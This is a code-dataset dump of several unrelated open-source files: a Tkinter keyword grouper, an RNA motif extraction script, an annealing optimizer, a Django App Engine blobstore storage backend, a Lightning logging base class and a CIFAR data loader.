OBJECT DECLARATIONS-----------------\n\t\t\n\t\tself.group_select = None #Keeps track of currently selected keyword group\n\t\tself.key_group = word_grouper(\"z\",\"a\") #Declare Keyword Group Object which does the backend work\n\t\tself.suggest_keywords = defaultdict(lambda: []) #Keep track of words for which we have already scraped Google\n\n\t#END HELPERS---------------------------------------------\n\n\t\tself.Import.pack(fill=BOTH, expand=True, side=LEFT)\n\t\tself.Buttons.pack(fill=BOTH, side=BOTTOM, anchor=SW)\n\t\tself.Groups.pack(fill=BOTH, expand=True, side=LEFT, padx=50, pady=50)\n\t\tself.Keywords.pack(fill=BOTH, expand=True, side=LEFT, padx=50, pady=50)\n\n\t#MENU---------------------------------------------------------\n\n\t\tself.filemenu = Menu(self.menubar, tearoff=0)\n\t\tself.filemenu.add_command(label=\"Import\", command = self.fill_list)\n\t\tself.filemenu.add_command(label=\"Export\", command = self.exp_file)\n\t\tself.filemenu.add_command(label=\"Export As CSV\", command = self.exp_csv)\n\t\tself.filemenu.add_separator()\n\t\tself.filemenu.add_command(label=\"Exit\", command = self.parent.quit)\n\t\tself.menubar.add_cascade(label=\"File\", menu=self.filemenu)\n\n\t\tself.editmenu = Menu(self.menubar, tearoff=0)\n\t\tself.editmenu.add_command(label = \"Split Keywords\", command = self.makeGroups) #same as process button\n\t\tself.editmenu.add_command(label = \"Clear Import List\", command = self.del_list)\n\t\tself.editmenu.add_command(label = \"Clear All\", command = self.clear_all) #erase everything\n\t\tself.editmenu.add_command(label=\"Get Google Suggestions\", \n\t\t\t\t\t\t\tcommand = lambda: self.get_suggestions('http://google.com/complete/search?output=toolbar&q=',\n\t\t\t\t\t\t\tself.suggest_keywords))\n\t\tself.menubar.add_cascade(label=\"Edit\", menu=self.editmenu)\n\n\t\tself.groupmenu = Menu(self.menubar, tearoff=0)\n\t\tself.groupmenu.add_command(label = \"Add Keyword Group\", command = self.group_window)\n\t\tself.groupmenu.add_command(label = \"Delete keyword Group\", command = self.del_group)\n\t\tself.groupmenu.add_separator()\n\t\tself.groupmenu.add_command(label = \"Add Keyword(s)\", command = self.keyword_window)\n\t\tself.groupmenu.add_command(label = \"Delete Keyword(s)\", command = self.del_kw)\n\t\tself.menubar.add_cascade(label=\"Keywords\", menu=self.groupmenu)\n\n\t\tself.parent.config(menu=self.menubar)\n\n\t#END MENU-----------------------------------------------------\n\n\t#TOP LEVEL WINDOWS--------------------------------------------\n\t\n\tdef keyword_window(self):\n\t\tself.newWindow = Toplevel()\n\t\tself.newWindow.config(bg=\"#E8E8E8\")\n\t\tself.key_pop = Add_Keywords(self.newWindow, self)\n\t\tself.newWindow.wm_title(\"Add Keywords\")\n\n\tdef group_window(self):\n\t\tself.newWindow = Toplevel()\n\t\tself.newWindow.config(bg=\"#E8E8E8\")\n\t\tself.key_pop = Add_Group(self.newWindow, self)\n\t\tself.newWindow.wm_title(\"Add Groups\")\n\n\t#END TOP LEVEL WINDOWS----------------------------------------\n\n\t#IMPORT LIST BUTTON FUNCTIONS---------------------------------\n\n\tdef fill_list(self):\n\t\tftypes = [('Text files', '*.txt')]\n\t\tdlg = tkFileDialog.Open(root, filetypes = ftypes)\n\t\tfl = dlg.show()\n\t\tself.key_group.in_file = fl\n\n\t\tif fl != '':\n\t\t\tx = open(fl,\"r\")\n\t\t\tfor line in x:\n\t\t\t\tself.Import.importList.insert(END, line)\n\t\t\t\tself.key_group.gui_wordlist.append(\"%s\" % line)\n\n\tdef del_word(self):\n\t\t#Get current importList selction\n\t\tselection = self.Import.importList.curselection()\n\t\tfor i in range(len(selection)):\n\t\t\tvalue = self.Import.importList.get(selection[-1-i])\n\t\t\tself.key_group.gui_wordlist.remove(value)\n\t\t\tself.Import.importList.delete(selection[-1-i])\n\n\tdef del_word_key(self, event):\n\t\t#Get current importList selction\n\t\tselection = self.Import.importList.curselection()\n\t\tfor i in range(len(selection)):\n\t\t\tvalue = self.Import.importList.get(selection[-1-i])\n\t\t\tself.key_group.gui_wordlist.remove(value)\n\t\t\tself.Import.importList.delete(selection[-1-i])\n\n\n\tdef del_list(self):\n\t\tself.Import.importList.delete(0, END)\n\t\tself.key_group.gui_wordlist = []\n\n\tdef makeGroups(self):\n\t\tself.key_group.gui_input()\n\t\tself.key_group.make_groups()\n\t\tself.key_group.make_keywords()\n\n\t\tself.Groups.groupList.delete(0, END)\n\t\tfor x in self.key_group.keyword_groups:\n\t\t\tself.Groups.groupList.insert(END, \"%s\" % x)\n\t\tself.Import.importList.delete(0, END)\n\t\tself.key_group.renew()\n\n\t#END IMPORT LIST BUTTON FUNCTIONS---------------------------------\n\n\t#MENU FUNCTIONS---------------------------------------------------\n\n\t#Export Keywords to File\n\tdef exp_file(self):\n\t\tf = tkFileDialog.asksaveasfile(mode='w', defaultextension=\".txt\")\n\t\tif f is None:\n\t\t\treturn\n\t\tfor key in self.key_group.keyword_groups:\n\t\t\tself.key_group.keyword_groups[key] = set(self.key_group.keyword_groups[key])\n\t\t\tf.write(\"------------- \\n\")\n\t\t\tf.write(key+\"\\n\")\n\t\t\tf.write(\"------------- \\n\")\n\t\t\tfor value in self.key_group.keyword_groups[key]:\n\t\t\t\tkwords = value\n\t\t\t\tf.write(value+\"\\n\")\n\t\tf.close()\n\n\tdef exp_csv(self):\n\t\tin_path = tkFileDialog.asksaveasfilename(defaultextension=\".csv\")\n\t\tself.key_group.write_to_csv(in_path)\n\n\tdef get_suggestions(self,URL, suggest_keywords):\n\t\t#dummy = [[\"test%s\" %x]*10 for x in range(26)]\n\t\tqry = self.group_select\n\t\tif suggest_keywords[qry] == []:\n\t\t\tfor a in Suggest.google_az_suggestions(URL,qry):\n\t\t\t\tsuggest_keywords[qry].append(a)\n\t\tSuggestions.suggest_window(dummy,self.key_group.keyword_groups[qry])# suggest_keywords[qry]\n\n\tdef clear_all(self):\n\t\tself.Import.importList.delete(0, END)\n\t\tself.Keywords.kwList.delete(0, END)\n\t\tself.Groups.groupList.delete(0, END)\n\t\tself.key_group.refresh()\n\n\t#END MENU FUNCTIONS-----------------------------------------------\n\n\t#KEYWORD LIST FUNCTIONS-------------------------------------------\n\n\t#Del kw Button function\n\tdef del_kw(self):\n\t\t#Find what word group is currently selected with the variable group_select\n\t\tcurrent_word = self.group_select\n\t\t#Get current self.Keywords.kwlist selction\n\t\tselection = self.Keywords.kwList.curselection()\n\t\tfor i in range(len(selection)):\n\t\t\tvalue = self.Keywords.kwList.get(selection[-1-i])\n\t\t\tself.Keywords.kwList.delete(selection[-1-i])\n\t\t\tself.key_group.keyword_groups[current_word].remove(str(value))\n\n\t#Del kw Key function\n\tdef del_kw_key(self, event):\n\t\t#Find what word group is currently selected with the variable group_select\n\t\tcurrent_word = self.group_select\n\t\t#Get current self.Keywords.kwlist selction\n\t\tselection = self.Keywords.kwList.curselection()\n\t\tfor i in range(len(selection)):\n\t\t\tvalue = self.Keywords.kwList.get(selection[-1-i])\n\t\t\tself.Keywords.kwList.delete(selection[-1-i])\n\t\t\tself.key_group.keyword_groups[current_word].remove(str(value))\n\n\t#END KEYWORD LIST FUNCTIONS---------------------------------------\n\n\t#GROUP LIST FUNCTIONS---------------------------------------------\n\n\tdef onselect(self, event):\n\t\t#Tkinter passes an event object to onselect()\n\t\tself.Keywords.kwList.delete(0, END)\n\t\tw = event.widget\n\t\tindex = int(w.curselection()[0])\n\t\tvalue = w.get(index)\n\t\t\n\t\tself.group_select = value\n\n\t\t#Creates even/odd gray/white bg colors\n\t\ti = 0\n\t\tfor word in self.key_group.keyword_groups[value]:\n\t\t\tif i % 2 == 0:\n\t\t\t\tself.Keywords.kwList.insert(END, word)\n\t\t\t\tself.Keywords.kwList.itemconfig(i,bg=\"#EBECF5\")\n\t\t\telse:\n\t\t\t\tself.Keywords.kwList.insert(END, word)\n\t\t\ti += 1\n\n\t#Delete Group Button Function\n\tdef del_group(self):\n\t\tselection = self.Groups.groupList.curselection()\n\t\tvalue = self.Groups.groupList.get(selection[0])\n\t\tdel self.key_group.keyword_groups[value]\n\t\tself.Groups.groupList.delete(ANCHOR)\n\t\t#Clear selected Groups self.Keywords.KwList\n\t\tself.Keywords.kwList.delete(0, END)\n\n\t#Delete Group Key Function\n\tdef del_group_key(self, event):\n\t\tselection = self.Groups.groupList.curselection()\n\t\tvalue = self.Groups.groupList.get(selection[0])\n\t\tdel self.key_group.keyword_groups[value]\n\t\tself.Groups.groupList.delete(ANCHOR)\n\t\t#Clear selected Groups self.Keywords.KwList\n\t\tself.Keywords.kwList.delete(0, END)\n\n\t#Call Popup for Keyword Adding from double click on KW group\n\tdef add_keyword_dc(self, event):\n\t\tadd_kw_window()\n\n\t#END GROUP LIST FUNCTIONS-----------------------------------------\n\nif __name__ == '__main__':\n\troot = Tk()\n\tapp = MainApplication(root)\n\troot.wm_title(\"Keyword Grouper\")\n\troot.mainloop()", "repo_name": "Cmiller9/KW_GRPR", "sub_path": "Keyword_Grouper/KwGui.py", "file_name": "KwGui.py", "file_ext": "py", "file_size_in_byte": 17287, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "keywordGroupObject.word_grouper", "line_number": 264, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 265, "usage_type": "call"}, {"api_name": "tkFileDialog.Open", "line_number": 325, "usage_type": "call"}, {"api_name": "tkFileDialog.asksaveasfile", "line_number": 373, "usage_type": "call"}, {"api_name": "tkFileDialog.asksaveasfilename", "line_number": 387, "usage_type": "call"}, {"api_name": "Scraper.Suggest.google_az_suggestions", "line_number": 394, "usage_type": "call"}, {"api_name": "Scraper.Suggest", "line_number": 394, "usage_type": "name"}, {"api_name": "Scraper.Suggestions.suggest_window", "line_number": 396, "usage_type": "call"}, {"api_name": "Scraper.Suggestions", "line_number": 396, "usage_type": "name"}]} +{"seq_id": "29491243682", "text": "#!/usr/bin/env python\n\nimport argparse\n\nfrom rnamake import resource_manager as rm\nfrom rnamake import util, motif\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='')\n\n parser.add_argument('-pdb', help='path to pdb', required=True)\n parser.add_argument('-name', required=False)\n parser.add_argument('-n', required=False)\n args = parser.parse_args()\n return args\n\nargs = parse_args()\n\nfname = util.filename(args.pdb)\n\nname = fname[:-4]\nif args.name:\n name = args.name\n\nrm.manager.add_motif(path=args.pdb, name=name, include_protein=1, align=0)\nm = rm.manager.get_motif(name=name)\n\nf = open(name + \".motif\", \"w\")\nf.write(m.to_str())\nf.close()", "repo_name": "zhuoyuzhang/RNAMake", "sub_path": "rnamake/bin/RNAMake.get_motif_from_pdb.py", "file_name": "RNAMake.get_motif_from_pdb.py", "file_ext": "py", "file_size_in_byte": 678, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "rnamake.util.filename", "line_number": 19, "usage_type": "call"}, {"api_name": "rnamake.util", "line_number": 19, "usage_type": "name"}, {"api_name": "rnamake.resource_manager.manager.add_motif", "line_number": 25, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 25, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 25, "usage_type": "name"}, {"api_name": "rnamake.resource_manager.manager.get_motif", "line_number": 26, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 26, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "828026564", "text": "import math\nfrom random import Random\nimport numpy as np\n\nfrom Events.Game.move.algos.GameObjects.data_lists.Result_list import Result_list\nfrom Events.Game.move.algos.GameObjects.data_lists.tools.map_ranges_tools import is_in_bondaries\nfrom Events.Game.move.algos.GameObjects.data_lists.tools.point import Point\nfrom Events.Game.move.algos.GameObjects.data_lists.tools.settings import Settings\nfrom Events.Game.move.algos.GameObjects.uav import Uav\nfrom Events.Game.move.check import check_if_cell_is_on_map\nfrom Events.Game.move.get_position import get_random_position_on_tier1\nimport typing\n\nfrom Events.Game.move.zones import get_zone_index\n\n\nclass Annealing_Algo():\n def __init__(self,settings:Settings,rand:Random):\n\n\n self.temperature=settings.temperature\n self.temperature_reduction=settings.temperature_reduction\n\n self.iterations_form_last_temperature_update=-1\n self.last_metropolis=0\n self.last_x=0\n self.last_decison=1\n self.randm_np=None\n init_start1_x=None\n self.settings=settings\n init_start2_x=None\n self.not_accepted_counter=0\n self.rand=None\n self.av_pts_new=0\n self.diff=0\n self.is_rand_choose=False\n self.all_accepted_results=[]\n if rand!=None:\n self.randm_np=np.random.RandomState()\n self.randm_np.seed(rand.randint(0,200000))\n self.rand=rand\n init_start1_x=rand.random()*settings.map_size_x\n init_start2_x=rand.random()*settings.map_size_x\n self.current_result={\"position\":[Point(init_start1_x,settings.tier1_distance_from_intruder),Point(init_start2_x,settings.tier1_distance_from_intruder)], \"points\":0}\n self.step=self.settings.annealing_step\n\n\n self.annealing_number_of_iterations=settings.annealing_number_of_iterations\n self.can_terget_be_changed=True\n\n\n def un_register_attack(self, candidate_points,candidate_positions:typing.List[Point],settings:Settings,result_list:Result_list):\n\n current_points=result_list.get_current_points_from_full_map(self.current_result[\"position\"][0],self.current_result[\"position\"][1])\n self.current_result[\"points\"]=current_points\n self.iterations_form_last_temperature_update=self.iterations_form_last_temperature_update+1\n if self.iterations_form_last_temperature_update>=self.annealing_number_of_iterations:\n self.iterations_form_last_temperature_update=0\n self.temperature=self.temperature*self.temperature_reduction\n # self.step=self.step*self.temperature_reduction\n self.not_accepted_counter=0\n\n\n\n self.av_pts_new=candidate_points\n\n value_delta=candidate_points-self.current_result[\"points\"]\n self.diff=candidate_points-self.current_result[\"points\"]\n metropolis=math.exp(-abs(value_delta) / self.temperature)\n x=self.rand.random()\n self.last_decison=0\n self.last_x=x\n self.last_metropolis=metropolis\n if value_delta>0:\n self.last_metropolis=1\n if (value_delta>0 or (x 65: #shorten it so extension fits in FileField\n name = name.split(\".\")[0][:60].rstrip() + u'.' + name.split(\".\")[1]\n logger.info(name)\n logger.info('Returning ' + str(data) + name )\n return '%s/%s' % (data, name)\n\n else:\n raise ValueError(\"The App Engine Blobstore only supports BlobInfo \"\n \"values. Data can't be uploaded directly. You have to \"\n \"use the file upload handler.\")\n\n def delete(self, name):\n delete(self._get_key(name))\n\n def exists(self, name):\n return self._get_blobinfo(name) is not None\n\n def size(self, name):\n return self._get_blobinfo(name).size\n\n def url(self, name):\n try:\n return get_serving_url(self._get_blobinfo(name))\n except NotImageError:\n return None\n\n def created_time(self, name):\n return self._get_blobinfo(name).creation\n\n def get_valid_name(self, name):\n return force_unicode(name).strip().replace('\\\\', '/')\n\n def get_available_name(self, name):\n return name.replace('\\\\', '/')\n\n def _get_key(self, name):\n return BlobKey(name.split('/', 1)[0])\n\n def _get_blobinfo(self, name):\n return BlobInfo.get(self._get_key(name))\n\nclass BlobstoreFile(File):\n\n def __init__(self, name, mode, storage):\n logger.info('BlobstoreFile__init on ' + name)\n self.name = name\n self._storage = storage\n self._mode = mode\n self.blobstore_info = storage._get_blobinfo(name)\n\n @property\n def size(self):\n return self.blobstore_info.size\n\n def write(self, content):\n raise NotImplementedError()\n\n @property\n def file(self):\n if not hasattr(self, '_file'):\n self._file = BlobReader(self.blobstore_info.key())\n return self._file\n\nclass BlobstoreFileUploadHandler(FileUploadHandler):\n \"\"\"\n File upload handler for the Google App Engine Blobstore.\n \"\"\"\n\n def new_file(self, *args, **kwargs):\n \"\"\"field_name, file_name, content_type, content_length, charset=None\"\"\"\n\n logger.debug('BlobstoreFileUploadHandler.new_file')\n super(BlobstoreFileUploadHandler, self).new_file(*args, **kwargs)\n\n blobkey = FindBlobKey(self.request.body)\n self.active = blobkey is not None\n if self.active:\n self.blobkey = BlobKey(blobkey)\n raise StopFutureHandlers()\n\n def receive_data_chunk(self, raw_data, start):\n \"\"\"\n Add the data to the StringIO file.\n \"\"\"\n if not self.active:\n return raw_data\n\n def file_complete(self, file_size):\n \"\"\"\n Return a file object if we're activated.\n \"\"\"\n logger.info('BlobstoreFileUploadHandler.file_complete')\n if not self.active:\n logger.info('not active')\n return\n return BlobstoreUploadedFile(\n blobinfo=BlobInfo(self.blobkey),\n charset=self.charset)\n\nclass BlobstoreUploadedFile(UploadedFile):\n \"\"\"\n A file uploaded into memory (i.e. stream-to-memory).\n \"\"\"\n\n def __init__(self, blobinfo, charset):\n logger.info('BlobstoreUploadedFile.__init__ %s' % blobinfo.content_type)\n super(BlobstoreUploadedFile, self).__init__(\n BlobReader(blobinfo.key()), blobinfo.filename,\n blobinfo.content_type, blobinfo.size, charset)\n self.blobstore_info = blobinfo\n\n def open(self, mode=None):\n pass\n\n def chunks(self, chunk_size=1024 * 128):\n self.file.seek(0)\n while True:\n content = self.read(chunk_size)\n if not content:\n break\n yield content\n\n def multiple_chunks(self, chunk_size=1024 * 128):\n return True\n\n#Djangoappengine license:\n\n#Copyright (c) Waldemar Kornewald, Thomas Wanschik, and all contributors.\n#All rights reserved.\n#\n#Redistribution and use in source and binary forms, with or without modification,\n#are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of All Buttons Pressed nor\n# the names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS' AND\n#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n#ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n", "repo_name": "tarhata/sjfnw", "sub_path": "sjfnw/grants/storage.py", "file_name": "storage.py", "file_ext": "py", "file_size_in_byte": 7205, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "django.core.files.storage.Storage", "line_number": 21, "usage_type": "name"}, {"api_name": "django.core.files.base.File", "line_number": 36, "usage_type": "argument"}, {"api_name": "mimetypes.guess_type", "line_number": 38, "usage_type": "call"}, {"api_name": "google.appengine.api.files.blobstore.create", "line_number": 39, "usage_type": "call"}, {"api_name": "google.appengine.api.files.blobstore", "line_number": 39, "usage_type": "attribute"}, {"api_name": "google.appengine.api.files", "line_number": 39, "usage_type": "name"}, {"api_name": "google.appengine.api.files.open", "line_number": 43, "usage_type": "call"}, {"api_name": "google.appengine.api.files", "line_number": 43, "usage_type": "name"}, {"api_name": "google.appengine.api.files.finalize", "line_number": 47, "usage_type": "call"}, {"api_name": "google.appengine.api.files", "line_number": 47, "usage_type": "name"}, {"api_name": "google.appengine.api.files.blobstore.get_blob_key", "line_number": 49, "usage_type": "call"}, {"api_name": "google.appengine.api.files.blobstore", "line_number": 49, "usage_type": "attribute"}, {"api_name": "google.appengine.api.files", "line_number": 49, "usage_type": "name"}, {"api_name": "google.appengine.ext.blobstore.BlobInfo", "line_number": 55, "usage_type": "name"}, {"api_name": "google.appengine.ext.blobstore.BlobKey", "line_number": 55, "usage_type": "name"}, {"api_name": "google.appengine.ext.blobstore.BlobInfo", "line_number": 56, "usage_type": "argument"}, {"api_name": "google.appengine.ext.blobstore.delete", "line_number": 73, "usage_type": "call"}, {"api_name": "google.appengine.api.images.get_serving_url", "line_number": 83, "usage_type": "call"}, {"api_name": "google.appengine.api.images.NotImageError", "line_number": 84, "usage_type": "name"}, {"api_name": "django.utils.encoding.force_unicode", "line_number": 91, "usage_type": "call"}, {"api_name": "google.appengine.ext.blobstore.BlobKey", "line_number": 97, "usage_type": "call"}, {"api_name": "google.appengine.ext.blobstore.BlobInfo.get", "line_number": 100, "usage_type": "call"}, {"api_name": "google.appengine.ext.blobstore.BlobInfo", "line_number": 100, "usage_type": "name"}, {"api_name": "django.core.files.base.File", "line_number": 102, "usage_type": "name"}, {"api_name": "google.appengine.ext.blobstore.BlobReader", "line_number": 121, "usage_type": "call"}, {"api_name": "django.core.files.uploadhandler.FileUploadHandler", "line_number": 124, "usage_type": "name"}, {"api_name": "sjfnw.grants.utils.FindBlobKey", "line_number": 135, "usage_type": "call"}, {"api_name": "google.appengine.ext.blobstore.BlobKey", "line_number": 138, "usage_type": "call"}, {"api_name": "django.core.files.uploadhandler.StopFutureHandlers", "line_number": 139, "usage_type": "call"}, {"api_name": "google.appengine.ext.blobstore.BlobInfo", "line_number": 157, "usage_type": "call"}, {"api_name": "django.core.files.uploadedfile.UploadedFile", "line_number": 160, "usage_type": "name"}, {"api_name": "google.appengine.ext.blobstore.BlobReader", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "13589620663", "text": "from typing import Any, Dict, List, Optional, Tuple\n\nimport lightning.pytorch as pl\nimport torch\nimport wandb\nfrom lightning.fabric import Fabric\n\nimport tools\n\n\nclass BaseLitModule(pl.LightningModule):\n \"\"\"\n Lightning Base Module\n \"\"\"\n\n def __init__(\n self,\n conf: Dict[str, Optional[Any]],\n fabric: Fabric,\n logging_prefixes: Optional[List[str]] = None,\n ):\n \"\"\"\n Constructor.\n :param conf: Configuration dictionary.\n :param fabric: Fabric instance.\n :param logging_prefixes: Prefixes for logging.\n \"\"\"\n super().__init__()\n self.conf = conf\n self.fabric = fabric\n if logging_prefixes is None:\n logging_prefixes = [\"train\", \"val\"]\n self.logging_prefixes = logging_prefixes\n self.metrics, self.avg_meters = self.configure_meters()\n if conf['logging'].get('wandb', {}).get('active', False):\n self.configure_wandb_metrics()\n self.current_epoch_ = 0\n\n def log_step(self,\n processed_values: Optional[Dict[str, torch.Tensor]] = None,\n metric_pairs: Optional[List[Tuple[torch.Tensor, torch.Tensor]]] = None,\n prefix: Optional[str] = \"\",\n ):\n \"\"\"\n Log the values and the metrics.\n :param processed_values: Values that are already processed and can be logged directly with an average value\n meter. Must be dictionaries with \"meter_key\" and \"value\".\n :param metric_pairs: Pairs of values that are fed into a metric meter. Must be tuples of (v1, v2), typically,\n v1 is a prediction and v2 is a target.\n :param prefix: Optional prefix for the logging.\n \"\"\"\n if processed_values is not None:\n for k, v in processed_values.items():\n meter_name = f\"{prefix}/{k}\" if prefix != \"\" else f\"{k}\"\n if meter_name not in self.avg_meters:\n self.avg_meters[meter_name] = tools.AverageMeter()\n self.avg_meters[meter_name](v)\n\n if metric_pairs is not None:\n for v1, v2 in metric_pairs:\n for m_name, metric in self.metrics.items():\n if m_name.startswith(prefix) or (prefix == \"\" and not \"/\" in m_name):\n metric(v1, v2)\n\n def configure_meters(self) -> (Dict[str, tools.AverageMeter], Dict[str, tools.AverageMetricWrapper]):\n \"\"\"\n Configure (create instances) the metrics.\n :return: Dictionary of metric meters and dictionary of loss meters.\n \"\"\"\n metrics, avg_meters = {}, {}\n for prefix in self.logging_prefixes:\n metrics.update({f\"{prefix}/{k}\": v for k, v in tools.metrics_from_conf(self.conf, self.fabric).items()})\n\n return metrics, avg_meters\n\n def configure_wandb_metrics(self):\n \"\"\"\n Configure the metrics for wandb.\n \"\"\"\n for prefix in self.logging_prefixes:\n wandb.define_metric(f'{prefix}/loss', summary='min')\n for m_name in self.metrics.keys():\n wandb.define_metric(f'{prefix}/{m_name}', summary='max')\n\n def log_(self) -> Dict[str, float]:\n \"\"\"\n Log the metrics.\n :return: Dictionary of logs.\n \"\"\"\n logs = {'epoch': self.current_epoch_}\n for m_name, m in self.avg_meters.items():\n val = m.mean\n if isinstance(val, torch.Tensor):\n val = val.item()\n logs[m_name] = val\n m.reset()\n for m_name, m in self.metrics.items():\n val = m.mean\n if isinstance(val, torch.Tensor):\n val = val.item()\n logs[m_name] = val\n m.reset()\n self.log_dict(logs)\n return logs\n\n def on_epoch_end(self) -> Dict[str, float]:\n \"\"\"\n Callback at the end of an epoch (log data).\n :return: Dictionary of logs.\n \"\"\"\n logs = self.log_()\n self.current_epoch_ += 1\n return logs\n", "repo_name": "sagerpascal/lateral-connections", "sub_path": "src/models/lightning_modules/lightning_base.py", "file_name": "lightning_base.py", "file_ext": "py", "file_size_in_byte": 4052, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "lightning.pytorch.LightningModule", "line_number": 11, "usage_type": "attribute"}, {"api_name": "lightning.pytorch", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 18, "usage_type": "name"}, {"api_name": "lightning.fabric.Fabric", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 40, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 41, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 42, "usage_type": "name"}, {"api_name": "tools.AverageMeter", "line_number": 56, "usage_type": "call"}, {"api_name": "tools.metrics_from_conf", "line_number": 72, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 65, "usage_type": "name"}, {"api_name": "tools.AverageMeter", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tools.AverageMetricWrapper", "line_number": 65, "usage_type": "attribute"}, {"api_name": "wandb.define_metric", "line_number": 81, "usage_type": "call"}, {"api_name": "wandb.define_metric", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 93, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 99, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 106, "usage_type": "name"}]} +{"seq_id": "43392803222", "text": "#!/usr/bin/env python3\n\n# reading json data using json module\n\nimport json\nreq_file=\"/home/inderpal2406/tmp/file_1.json\"\nfo=open(req_file,\"r\")\n#print(fo.read())\t# read json data as string, but at a time we can read data only once, if I perform json.load() after this, error\nprint(json.load(fo))\n#print(json.load(fo).get(\"glossary\"))\t# performing dictionary operation, this throws error if above statement is not commented\nfo.close()\n", "repo_name": "inderpal2406/python", "sub_path": "udemy/01_walkthrough/working_with_json_files_2.py", "file_name": "working_with_json_files_2.py", "file_ext": "py", "file_size_in_byte": 433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.load", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "27801813328", "text": "import logging\n\nimport torch\n\nfrom torchvision import transforms, datasets\nfrom torch.utils.data import DataLoader, RandomSampler, DistributedSampler, SequentialSampler\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_loader(local_rank, hp):\n # if local_rank not in [-1, 0]:\n # torch.distributed.barrier()\n\n transform_train = transforms.Compose([\n transforms.RandomResizedCrop((hp.data.image_size, hp.data.image_size), scale=(0.05, 1.0)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),\n ])\n transform_test = transforms.Compose([\n transforms.Resize((hp.data.image_size, hp.data.image_size)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),\n ])\n\n if hp.data.dataset == \"cifar10\":\n trainset = datasets.CIFAR10(root=hp.data.path,\n train=True,\n download=True,\n transform=transform_train)\n testset = datasets.CIFAR10(root=hp.data.path,\n train=False,\n download=True,\n transform=transform_test) if local_rank in [-1, 0] else None\n\n else:\n trainset = datasets.CIFAR100(root=hp.data.path,\n train=True,\n download=True,\n transform=transform_train)\n testset = datasets.CIFAR100(root=hp.data.path,\n train=False,\n download=True,\n transform=transform_test) if local_rank in [-1, 0] else None\n # if local_rank == 0:\n # torch.distributed.barrier()\n\n train_sampler = RandomSampler(trainset) if local_rank == 0 else DistributedSampler(trainset)\n test_sampler = SequentialSampler(testset)\n train_loader = DataLoader(trainset,\n sampler=train_sampler,\n batch_size=hp.train.batch,\n num_workers=4,\n pin_memory=True)\n test_loader = DataLoader(testset,\n sampler=test_sampler,\n batch_size=hp.train.valid_batch,\n num_workers=4,\n pin_memory=True) if testset is not None else None\n\n return train_loader, test_loader", "repo_name": "rishikksh20/CeiT-pytorch", "sub_path": "data_utils.py", "file_name": "data_utils.py", "file_ext": "py", "file_size_in_byte": 2540, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 88, 